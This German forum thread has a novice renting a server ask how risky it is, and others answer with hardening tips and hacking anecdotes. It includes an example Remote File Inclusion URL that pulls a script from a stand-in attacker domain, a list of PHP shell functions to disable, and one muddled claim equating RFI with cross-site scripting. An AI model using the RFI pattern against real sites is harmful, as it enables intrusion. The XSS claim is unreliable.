Wie gefährlich ist ein Server? Wurdet ihr schon mal gehackt?

Wie gesagt, das nennt man "Remote File Inclusion" - RFI
(der Name erscheint ja auch sinnig )

echt aber wie nennt man dann sowas z.B.

ht*p://domain.tld/index.php=module123=ht*p://www.hackdomain.tld/hackscript.txt

Das, was du da beschreibst, nennt sich "Remote File Inclusion". Kurz: RFI

Cross-Site Scripting (kurz XSS) bedeutet, dass man HTML/Javascript Code in die Ausgabe einer Seite einschleust. Das wird verhindert, indem man Eingabeparameter innerhalb des Scriptes vernünftig behandelt.

Für PHP ist übrigens das Suhosin Modul zu empfehlen.

So als kleiner Tipp.

In 90 % aller Fälle, werden Server über phpScripte gehackt.
Abhilfe kann man schon schaffen, indem man url_fopen in der phpini deaktiviert ... somit fällt Crossite scripting schonmal flach. Also es können keine scripte von anderen servern bei dir nachgeladen werden.

Dann sollte man bestimmte Befehle auch sperren:

z.B.
show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, disk_total_space

(phpinfo deswegen, da es keinen was angeht, wie deine Konfiguration ist ... als Serverbetrieber solltest du die nämlich selber kennen)

weiter empfielt sich bei einem php-Portal Bot-Trap zu verwenden.
Das gute Stück ist zwar in erster Linie gegen WebSpam entwickelt wurden, hält bei mir aber fast alle Crossite Scipter von meinem Portal fern.

Wenn ich mir die Logs da anschaue, gibt es ca. 300 Angriffe pro Tag :/

Wenn MailServer oder der gleichen gehackt werden, handelt es sich in den meisten Fällen um eine totale Fehlkonfiguration oder zu einfache Passwörter.

seit 4 Jahren ist bei mir nichts mehr vorgefallen ....
Gehackt wurde ich nur einmal und das war noch zu Windowszeiten. (Ja so einen schmarm hatte ich mal betrieben)

Tja der Mailserver war ein open relay und ein Spammer aus dem Reisland hatte daran seine Freude.

Bemerkt hatte ich das relativ spät ... eigentlich erst als ich mitbekommen hatte, dass der speicherplatz auf C voll war (was nicht sein konnte).

Tja C war voll, weil sich fast 1 Milliarde Emails im Ordner für nicht zustellbare Emails befand.
Server war dann überall blacklisted ... gekommen ist damls zum Glück nie was. Tja und schnell hatte man gelernt und abschied von Windows genommen und sichrichtig mit Linux beschäftigt.

Gehackt in dem Sinne wurde ich bislang nicht, allerdings gibt es mal eine Lücke in einem Debianpaket. Diese sollte als Schlupfloch für mein System dienen, allerdings war viel Glück im Spiel, weil ich mir das 'Spiel' live und und in Farbe verfolgen konnte...
Das schlimme an der Geschichte war, den Maintainern von Debian war das Problem schon lange zuvor bekannt und haben den entsprechenden Patch erst sehr spät zur Verfügung gestellt.
Aus dem Grund beobachte ich meine NOCH Debian Server jeden Tag mit Argwohn und sehr sorgfältig BIS diese durch ein anderes OS ersetzt werden.

Sicherheit bedeutet in erster Linie eine anständige Konfiguration und Installation aller auf dem System installierter Dienste. Was man nicht brauch - runter damit.
Quark wie ein OS mit GUI (Ubuntu) hat ebenso wenig zu suchen wie Xampp auf Windows.

Wichtig ist auch für einem Anfänger, es gibt genügend Tutorials und Howtos wie man Dienste installieren kann, aber wie verhält man sich am Tag X?
Wie schnell realisiere ich einen Angriff? Wie schnell reagiere ich und nehme die Kiste vom Netz? Wie sah meine Backupstrategie aus? Wie kann ich einen erneuten Angriff verhindern? Bin ich in der Lage eine Analyse der Logfiles durchzuführen und daraus meine Schlüsse zu ziehen wie es zum Hack kommen konnte? ... und und und...

In solchen Fällen wird kein fail2ban oder sonstiger Schmarrn einen Angriff aufhalten. Erst recht keine gesperrten Ports oder lokale Firewall (ausgen. Windows).

Toy toy toy, hatte bisher glück. Ausser etlichen DDos Attacken hatte ich bislang keine Schwierigkeiten.


Ich empfehle denyhost, fail2ban und für apache mod_security oder intrusion_detecion installieren. Bringt einwenig sicherheit mit, wobei die Programe selbst auch bugs haben können. Natürlich kann man auch über iptables bereits ne menge blocken wenn mans kann, ich kanns nicht noch nicht so gut .

hab nix gesagt

Nur das einspielen von Updates reicht aber nicht aus. Man muss die Dienste wie SSH, FTP, Apache, Mail usw. auch richtig konfigurieren können. Das mit dem Open Relay Server ist ja ein Konfigurationsfehler.
Alles was du nicht brauchst einfach "herunterfahren". Und was sehr wichtig ist den SSH-Zugang absichern (Port ändern usw.)

Die Geschichte mit dem 17-jährigen ist - soweit er das nicht mit Absicht oder grob fahrlässig gemacht hat - wohl eher ein urbaner Mythos.

Wenn man regelmäßig Updates installiert und sich über die aktuellen Sicherheitslücken informiert, dann ist man schonmal gut dabei.
Oft sind es einfach fehlerhafte PHP Skripte, über die in einen Server eingebrochen wird. Da gibt es so gut wie nie eine "auto update" Funktion, man muss sich also selber drum kümmern, immer alles aktuell zu haben.

Natürlich sollte man auch schauen, ob sich der Server irgendwie komisch verhält:
Verbraucht er unerklärlicherweise viele Resourcen? Laufen Prozesse, die dir vorher nicht aufgefallen sind? Schiebt er Traffic, als ob es keinen Morgen gäbe?

Nach einer gewissen Zeit entwickelt man einen sechsten Sinn um die Sicherheit seiner Maschinen zu beurteilen, Übung macht den Meister.

Oft gibt es in den Handbüchern der Distributionen auch einen Abschnitt über Sicherheit. Ist nicht verkehrt da mal reinzuschauen.

Danke für eure Antworten!

Ist der Server total dicht, wenn ich den Apache deaktiviere?
sudo /etc/init.d/apache2 stop

In den ersten Wochen soll der Server eher ein Spielzeug sein und da möchte ich wirklich nichts riskieren. Aus diesem Grund würde mich interessieren, wie der Server total dicht ist. Eventuell kann man ja auch alle Ports sperren? Wenn ja, wie?

Meine Kisten wurden in 5 Jahren 2mal gehackt. Einmal über eine PHP-Sicherheitslücke (und Asche auf mein Haupt wegen allow_furl_open), paar Tausende Spammails gingen raus.
Ein anderes Mal hat jemand über den Propftpd-Bug (Einloggen per www-data etc möglich) eine PHPShell geuppt, konnte dann über "mod_userdir" darauf zugreifen, und hat nen psybnc installiert.

gruß

http://www.vorsicht-server.de/
Darauf wird hier immer gerne hingewiesen, finde ich auch gut so.
Ohne eine Sicherheitsstrategie lieber keinen Server holen, das kann wirklich böse nach hinten losgehen.

Meine Maschinen wurden zum Glück noch nie gehackt. (Glück? Eher gute Strategie )
Sehe aber fast täglich in meinen Logs (z.B. fail2ban, proFTPd) Loginversuche von IP's, die nicht mir oder meinen Kunden gehören und sich versuchen mit Accounts anzumelden, die es nicht auf meinem System gibt. Also Versuche gab und gibt es ziemlich häufig, solange man alles gut versperrt und auch Ahnung davon hat, kann man das Risiko aber minimieren.
Meine Empfehlung: Probier auf deiner Heim-Kiste rum, vor allem mit so Diensten wie Webservern, FTP-Servern, SSH-Servern etc. http://www.howtoforge.com ist auch immer eine gute und nützliche Ressource für HowTo's, auch zum Thema Sicherheit.

Hallo!

Da ich mir gestern einen Isgenug 2008 bestellt habe, kommen in der Wartezeit auf meinen Server einige Fragen auf.

Es wird oft davor gewarnt, einen eigenen Server zu betreiben, da dies sehr viele Gefahren birgt. Es kursiert eine Geschichte im Netz, die einige vielleicht schon gelesen haben. Im Wesentlichen geht es darum, dass ein Server als Spamschleuder missbraucht wurde, und der 17-jährige Inhaber daraufhin Privatkonkurs anmelden musste. Sein Fehler war, dass er keine Sicherheitsupdates durchführte und den Mail-Server als Open Relay konfigurierte.

Ich habe den Isgenug-Server mit Ubuntu 8.04 bestellt und habe schon mit Debian und Ubuntu auf meinem Desktop gearbeitet. Updates und Installation via apt-get stellen kein Problem für mich dar. Mit der Konsole kann ich auch im Großen und Ganzen umgehen (verschieben, löschen, editieren,...).

Ich habe den Server bestellt, weil ich mich einfach mit der Administration von Linux-Servern beschäftigen möchte und nebenbei dann auch einige Webprojekte für Bekannte und Verwandte hosten werde. Teilweise mit Content-Management-Systemen, Gästebücher und Foren. Ich achte aber darauf, dass immer alle Updates bei diesen Systemen eingespielt werden.


Wie sicher oder unsicher ist so ein Server mit meinen geringen Linux-KnowHow und welche Gefahren birgt er tatsächlich? Für welche Sachen muss ich dann gerade stehen? Was ist beispielsweise, wenn mein Server gehackt wird und dann als Warez- oder Spam-Server missbraucht wird?
Es ist ziemlich wahrscheinlich, dass es gerade bei solchen günstigen Angeboten, sehr viele Leute gibt, die einen Server gemietet haben und nicht einmal Updates durchführen (können) und noch viel geringeres KnowHow als ich haben.

Wurde euer Server schon mal gehackt? Und habt ihr eventuell Probleme bekommen, weil Spam versendet wurde oder der Server als Warez-Server missbraucht wurde?

Was würdet ihr mir empfehlen? Wie soll ich mich vor Angriffen am besten schützen? Eventuell könnt ihr mir ja auch Lesematerial verlinken, um mich noch in diesem Gebiet ausführlicher einzulesen zu können.

lg
cha